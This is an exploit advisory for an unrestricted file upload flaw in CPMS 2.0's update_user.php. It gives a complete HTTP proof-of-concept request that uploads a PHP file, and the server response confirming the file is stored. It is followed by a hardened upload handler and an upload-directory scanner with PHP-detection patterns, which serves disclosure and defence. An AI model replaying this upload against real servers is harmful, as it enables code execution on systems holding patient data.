PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities

2025.01.07
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities
# Author: nu11secur1ty
# Date: 12/19/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code#comment-105951
# Reference: https://portswigger.net/web-security/file-upload and https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload

## Description:
The profile_picture parameter of update_user.php does not validate the extension of the uploaded file. A malicious admin user can therefore upload an arbitrary PHP file to the server and execute it directly from the browser.

STATUS: HIGH-CRITICAL Vulnerability

[+] PoC:

```http
POST /pwnedhost/pms/update_user.php?user_id=1 HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=9frtcadqm6q0ttavrpjquh3hif
Content-Length: 728
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://192.168.100.45
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2AQt0lyUq6vhBVY9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.100.45/pwnedhost/pms/update_user.php?user_id=1
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="hidden_id"

1
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="display_name"

Administrator
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="password"


------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="profile_picture"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="save_user"


------WebKitFormBoundary2AQt0lyUq6vhBVY9--
```

[+] Response:

The server accepts the upload and the page it returns already references the stored file under user_images/ with its .php extension intact (the sidebar `<img src="user_images/17358952721nsi1deyou.php ">` in the body below), so the file is reachable through the web server.

```http
HTTP/1.1 302 Found
Date: Fri, 03 Jan 2025 09:10:14 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: congratulation.php?goto_page=users.php&message=user update successfully
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 10476

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Google Font: Source Sans Pro -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&display=fallback">
<!-- Font Awesome -->
<link rel="stylesheet" href="plugins/fontawesome-free/css/all.min.css">
<!-- Theme style -->
<link rel="stylesheet" href="dist/css/adminlte.min.css">
<link rel="stylesheet" href="dist/js/jquery_confirm/jquery-confirm.css">
<link rel="stylesheet" href="dist/css/default.css" />
<title>Update User Details - Clinic's Patient Management System in PHP</title>
</head>
<body class="hold-transition sidebar-mini dark-mode layout-fixed layout-navbar-fixed">
<!-- Site wrapper -->
<div class="wrapper">
<!-- Navbar -->
<nav class="main-header navbar navbar-expand navbar-dark navbar-light fixed-top">
<!-- Left navbar links -->
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" data-widget="pushmenu" href="#" role="button"><i class="fas fa-bars"></i></a>
</li>
</ul>
<a href="index3.html" class="navbar-brand">
<span class="brand-text font-weight-light">Clinic's Patient Management System - PHP </span>
</a>
<!-- Right navbar links -->
<ul class="navbar-nav ml-auto">
<li class="nav-item">
<div class="login-user text-light font-weight-bolder">Howdy, Administrator!</div>
</li>
</ul>
</nav>
<!-- /.navbar -->
<aside class="main-sidebar sidebar-dark-primary bg-black elevation-4">
<a href="./" class="brand-link logo-switch bg-black">
<h4 class="brand-image-xl logo-xs mb-0 text-center"><b>CMS</b></h4>
<h4 class="brand-image-xl logo-xl mb-0 text-center">Clinic's <b>CMS</b></h4>
</a>
<!-- Sidebar -->
<div class="sidebar">
<!-- Sidebar user (optional) -->
<div class="user-panel mt-3 pb-3 mb-3 d-flex">
<div class="image">
<img src="user_images/17358952721nsi1deyou.php " class="img-circle elevation-2" alt="User Image" />
</div>
<div class="info">
<a href="#" class="d-block">Administrator</a>
</div>
</div>
<!-- Sidebar Menu -->
<nav class="mt-2">
<ul class="nav nav-pills nav-sidebar flex-column" data-widget="treeview" role="menu" data-accordion="false">
<!-- Add icons to the links using the .nav-icon class with font-awesome or any other icon font library -->
<li class="nav-item" id="mnu_dashboard">
<a href="dashboard.php" class="nav-link">
<i class="nav-icon fas fa-tachometer-alt"></i>
<p> Dashboard </p>
</a>
</li>
<li class="nav-item" id="mnu_patients">
<a href="#" class="nav-link">
<i class="nav-icon fas fa-user-injured"></i>
<p> <i class="fas "></i> Patients <i class="right fas fa-angle-left"></i> </p>
</a>
<ul class="nav nav-treeview">
<li class="nav-item">
<a href="new_prescription.php" class="nav-link" id="mi_new_prescription">
<i class="far fa-circle nav-icon"></i>
<p>New Prescription</p>
</a>
</li>
<li class="nav-item">
<a href="patients.php" class="nav-link" id="mi_patients">
<i class="far fa-circle nav-icon"></i>
<p>Add Patients</p>
</a>
</li>
<li class="nav-item">
<a href="patient_history.php" class="nav-link" id="mi_patient_history">
<i class="far fa-circle nav-icon"></i>
<p>Patient History</p>
</a>
</li>
</ul>
</li>
<li class="nav-item" id="mnu_medicines">
<a href="#" class="nav-link">
<i class="nav-icon fas fa-pills"></i>
<p> Medicines <i class="fas fa-angle-left right"></i> </p>
</a>
<ul class="nav nav-treeview">
<li class="nav-item">
<a href="medicines.php" class="nav-link" id="mi_medicines">
<i class="far fa-circle nav-icon"></i>
<p>Add Medicine</p>
</a>
</li>
<li class="nav-item">
<a href="medicine_details.php" class="nav-link" id="mi_medicine_details">
<i class="far fa-circle nav-icon"></i>
<p>Medicine Details</p>
</a>
</li>
</ul>
</li>
<li class="nav-item" id="mnu_reports">
<a href="#" class="nav-link">
<i class="nav-icon fas fa-edit"></i>
<p> Reports <i class="fas fa-angle-left right"></i> </p>
</a>
<ul class="nav nav-treeview">
<li class="nav-item">
<a href="reports.php" class="nav-link" id="mi_reports">
<i class="far fa-circle nav-icon"></i>
<p>Reports</p>
</a>
</li>
</ul>
</li>
<li class="nav-item" id="mnu_users">
<a href="users.php" class="nav-link">
<i class="nav-icon fa fa-users"></i>
<p> Users </p>
</a>
</li>
<li class="nav-item">
<a href="logout.php" class="nav-link">
<i class="nav-icon fa fa-sign-out-alt"></i>
<p> Logout </p>
</a>
</li>
</ul>
</nav>
<!-- /.sidebar-menu -->
</div>
<!-- /.sidebar -->
</aside>
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<section class="content-header">
<div class="container-fluid">
<div class="row mb-2">
<div class="col-sm-6">
<h1>Users</h1>
</div>
</div>
</div><!-- /.container-fluid -->
</section>
<!-- Main content -->
<section class="content">
<!-- Default box -->
<div class="card card-outline card-primary rounded-0 shadow">
<div class="card-header">
<h3 class="card-title">Update User</h3>
<div class="card-tools">
<button type="button" class="btn btn-tool" data-card-widget="collapse" title="Collapse">
<i class="fas fa-minus"></i>
</button>
</div>
</div>
<div class="card-body">
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="hidden_id" value="1">
<div class="row">
<div class="col-lg-4 col-md-4 col-sm-4 col-xs-10">
<label>Display Name</label>
<input type="text" id="display_name" name="display_name" required="required" class="form-control form-control-sm rounded-0" value="Administrator" />
</div>
<br> <br> <br>
<div class="col-lg-4 col-md-4 col-sm-4 col-xs-10">
<label>Username</label>
<input type="text" id="username" name="username" required="required" class="form-control form-control-sm rounded-0" value="admin" />
</div>
<div class="col-lg-4 col-md-4 col-sm-4 col-xs-10">
<label>Password</label>
<input type="password" id="password" name="password" class="form-control form-control-sm rounded-0"/>
</div>
<div class="col-lg-4 col-md-4 col-sm-4 col-xs-10">
<label>Profile picture</label>
<input type="file" id="profile_picture" name="profile_picture" class="form-control form-control-sm rounded-0" />
</div>
</div>
</div>
<div class="clearfix">&nbsp;</div>
<div class="row">
<div class="col-lg-11 col-md-10 col-sm-10">&nbsp;</div>
<div class="col-lg-1 col-md-2 col-sm-2 col-xs-2">
<button type="submit" id="save_user" name="save_user" class="btn btn-primary btn-sm btn-flat btn-block">Update</button>
</div>
</div>
</form>
</div>
</div>
</section>
<footer class="main-footer fixed-bottom">
<strong>Copyright &copy; 2025 <a href="./">Clinic's Patient Management System</a>.</strong> All rights reserved.
<div class="float-right d-sm-block"> PHP - CPMS Version 2.0 </div>
</footer>
<!-- Control Sidebar -->
<aside class="control-sidebar control-sidebar-dark">
<!-- Control sidebar content goes here -->
</aside>
<!-- /.control-sidebar -->
</div>
<!-- ./wrapper -->
<!-- jQuery -->
<script src="plugins/jquery/jquery.min.js"></script>
<!-- Bootstrap 4 -->
<script src="plugins/bootstrap/js/bootstrap.bundle.min.js"></script>
<!-- AdminLTE App -->
<script src="dist/js/adminlte.min.js"></script>
<!-- AdminLTE for demo purposes -->
<!-- <script src="dist/js/demo.js"></script> -->
<script src="dist/js/jquery_confirm/jquery-confirm.js"></script>
<script src="dist/js/common_javascript_functions.js"></script>
<script>
var message = '';
if(message !== '') { showCustomMessage(message); }
</script>
</body>
</html>
```

# Reproduce:
https://www.patreon.com/posts/cpms-version-2-0-119208840

## Time spent: 00:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
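The root cause described above is an upload handler that trusts the client-supplied filename and drops the file inside the web root. The following is an added example, not code from the CPMS project or from the advisory author: it shows that unsafe pattern next to a hardened handler. The storage directory, the 2 MiB limit, the PNG re-encoding and the function names are assumptions made for this illustration.

```php
<?php
// Added example (not the CPMS project's code): the upload pattern behind the
// reported issue, beside a hardened version of the same handler.
// $uploadDir, the size limit and the PNG re-encoding are assumptions.
declare(strict_types=1);

// Vulnerable pattern (illustrative): the client-supplied filename decides the
// extension, and the file lands inside the web root, so "info.php" becomes a
// script Apache will execute the moment it is requested.
function storeProfilePictureUnsafe(array $file, string $uploadDir): string
{
    $dest = rtrim($uploadDir, '/') . '/' . time() . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened handler: checks on the actual content, a server-chosen name and
// extension, and a storage directory that should sit outside the web root.
function storeProfilePictureSafe(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if ($file['size'] > 2 * 1024 * 1024) {                 // assumed limit
        throw new RuntimeException('file too large');
    }

    // 1. Type decision from libmagic on the real bytes, against an allowlist.
    //    The client's filename and Content-Type header are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        throw new RuntimeException("rejected type: $mime");
    }

    // 2. Decode and re-encode with GD (requires ext/gd). A polyglot, i.e. a
    //    valid image with PHP code appended, still passes step 1; re-encoding
    //    writes a fresh PNG from the pixel data, so the appended code is lost.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('file does not decode as an image');
    }

    // 3. Random, server-chosen name with one fixed extension; no user input
    //    ever reaches the path.
    $name = bin2hex(random_bytes(16)) . '.png';
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!imagepng($img, $dest)) {
        throw new RuntimeException('could not write image');
    }
    imagedestroy($img);
    chmod($dest, 0644);
    return $name;   // persist this name, never the original filename
}

// Usage: the form field name matches the vulnerable app's "profile_picture";
// the private_uploads directory is an assumed location outside the web root.
if (isset($_FILES['profile_picture'])) {
    try {
        $stored = storeProfilePictureSafe($_FILES['profile_picture'], __DIR__ . '/../private_uploads');
        echo 'stored as ' . htmlspecialchars($stored) . "\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage()) . "\n";
    }
}
```

The validation alone is not the whole fix: the directory that holds uploads should also be one the web server will never hand to the PHP engine (for Apache, a `<Directory>` block with `php_admin_flag engine off` or a `RemoveHandler`/`RemoveType` for `.php`), and the images should be served back through a small read-only script that sets a fixed image Content-Type together with `X-Content-Type-Options: nosniff`. With those layers in place, even an upload that slips past the checks is just bytes on disk rather than a script.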
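Operators who already run this application want a quick way to tell whether the upload directory has been abused. The following CLI check is an added example, not part of the advisory or of the CPMS project; it walks the upload directory (user_images/, the path visible in the response above, is assumed as the default) and reports files with an extension a web server might execute, files whose content is not an image according to libmagic, and files that carry a PHP open tag anywhere in their bytes, which catches both plain scripts and image/PHP polyglots.

```php
<?php
// Added example (not part of the advisory or the CPMS project): scan an
// upload directory for files that should not be there. The default path
// user_images/ is assumed from the response shown in the advisory.
declare(strict_types=1);

/**
 * Returns an array of path => list of reasons for every suspicious file.
 */
function scanUploadDir(string $dir): array
{
    $findings = [];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($iter as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path = $entry->getPathname();
        $reasons = [];

        // a) Extension the server may execute, including double extensions
        //    such as "pic.php.jpg" and trailing-space variants.
        if (preg_match('/\.(php\d?|phtml|phar|phps)(\.|\s|$)/i', $entry->getFilename())) {
            $reasons[] = 'executable extension';
        }

        // b) Content is not an image according to libmagic.
        $mime = (string) $finfo->file($path);
        if (strpos($mime, 'image/') !== 0) {
            $reasons[] = "non-image content ($mime)";
        }

        // c) PHP open tag anywhere in the bytes (plain script or polyglot).
        $data = file_get_contents($path);
        if ($data !== false && preg_match('/<\?(php\b|=)/i', $data)) {
            $reasons[] = 'contains PHP open tag';
        }

        if ($reasons !== []) {
            $findings[$path] = $reasons;
        }
    }
    return $findings;
}

$dir = $argv[1] ?? 'user_images';
if (!is_dir($dir)) {
    fwrite(STDERR, "not a directory: $dir\n");
    exit(2);
}
$findings = scanUploadDir($dir);
foreach ($findings as $path => $reasons) {
    printf("%s: %s\n", $path, implode(', ', $reasons));
}
exit($findings === [] ? 0 : 1);
```

Run it as `php scan_uploads.php /path/to/pms/user_images`; a non-zero exit status makes it easy to wire into a cron job or a monitoring check. Any hit on reason (a) or (c) in a directory that is supposed to hold only profile pictures warrants an incident review of the admin accounts that could have submitted the update_user.php form, since the advisory's vector requires an authenticated admin session.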


Copyright 2025, cxsecurity.com